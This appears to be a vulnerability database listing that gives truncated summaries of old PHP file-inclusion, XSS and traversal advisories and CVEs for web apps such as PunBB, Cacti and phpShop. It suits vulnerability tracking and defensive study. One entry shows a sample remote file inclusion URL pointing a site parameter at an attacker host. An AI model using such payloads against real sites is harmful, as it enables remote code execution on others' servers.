minibb2-rfi.txt

Title : MiniBB Forum = 2 Remote File Include index.php Discovered By :::: ThE-LoRd-Of-CrAcKiNg MeHdi ------------------------------------------------------------------------ Sorce Code: http://www.minibb.net/download.php?file=minibb20 ----- Affected software description : Application : MiniBB For...

Comdev Links Directory 3.1 :) <= Remote File Inclusion

+-------------------------------------------------------------------- + + Comdev Links Directory 3.1 : = Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: Comdev CSV Importer 3.1 + Venedor ...........: http://www.comdevweb.com +...

phpAutoMembersArea <= 3.2.5 (installed_config_file) Remote Inclusion

Exploit for unknown platform in category web applications ==================================================================== phpAutoMembersArea = 3.2.5 installedconfigfile Remote Inclusion ====================================================================...

phorum5114local.txt

Some vulnerabilities have been discovered in Phorum, which can be exploited by malicious people to conduct cross-site scripting attacks, disclose sensitive information, and potentially compromise a vulnerable system. 1 Input passed to the "template" parameter in pm.php isn't properly verified,...

plumeCMS113.txt

The original article can be found at: http://www.hamid.ir/security/ http://www.IHSteam.com Vulnerable Systems: Plume CMS 1.1.3 Vulnerable Code : path/plume-1.1.3/plume/manager/tools/link/dbinstall.php //Vulnerable Code :line 39 requireonce $PXconfig'managerpath'.'/inc/class.checklist.php';...

CVE-2006-3028

PHP remote file inclusion vulnerability in statmodules/usersage/module.php in Minerva 2.0.8a Build 237 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

fr-dyn0.txt

FriendsReunited.co.uk - XSS hole -------------------------------- Desc: Theres' a XSS hole in FriendsReunited Risk: Medium to High can be used to include malicious code Discovered by : dyn0 codeslaghatgmail.com http://0xdeadface.co.uk Site blurb : So FriendsReunited is one of those places where...

CVE-2005-3079

PunBB before 1.2.8 allows remote attackers to perform "code inclusion" via the user language selection...

CVE-2005-3079

PunBB before 1.2.8 is affected by a file-inclusion vulnerability triggered via the user language selection, allowing an attacker with an account to cause PHP code execution or read local files. The Nessus plugin details a broader set of flaws, including a similar file-inclusion path that can exec...

CVE-2005-3079

PunBB before 1.2.8 allows remote attackers to perform "code inclusion" via the user language selection...

[SA16908] PunBB Two Vulnerabilities

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

CVE-2005-1526

PHP remote file inclusion vulnerability in configsettings.php in Cacti before 0.8.6e allows remote attackers to execute arbitrary PHP code via the configincludepath parameter...

CVE-2005-0437

Directory traversal vulnerability in awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to include arbitrary Perl modules via .. dot dot sequences in the loadplugin parameter...

Easyins Stadtportal

Easyins Stadtportal v4 and prior seems to be vulnerable to a code inclusion in index.php http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com If anybody could explain it better than me, do it : I'm not a security master, i'm just trying to learn about it : Thank...

Arbitrary code inclusion in phpShop

A vulnerability has been discovered in the popular E-Commerce package 'phpShop'. The vulnerability's details are available in the attached advisory, or at http://www.fribble.net/advisories/phpshop29-04-04.txt Due to the nature of this vulnerability, I notified the lead programmer for this package...

include&#40;&#41; vuln in EasyDynamicPages v.2.0

Producr:EasyDynamicPages v.2.0: Advanced Portal Management System Vendors:http://software.stoitsov.com Bug :include Risk:Cao Author:tsbeginnervnc Web : www.security.com.vn ------------------------------------- Introduction : system, personal or business site or what you need. The goal is to have ...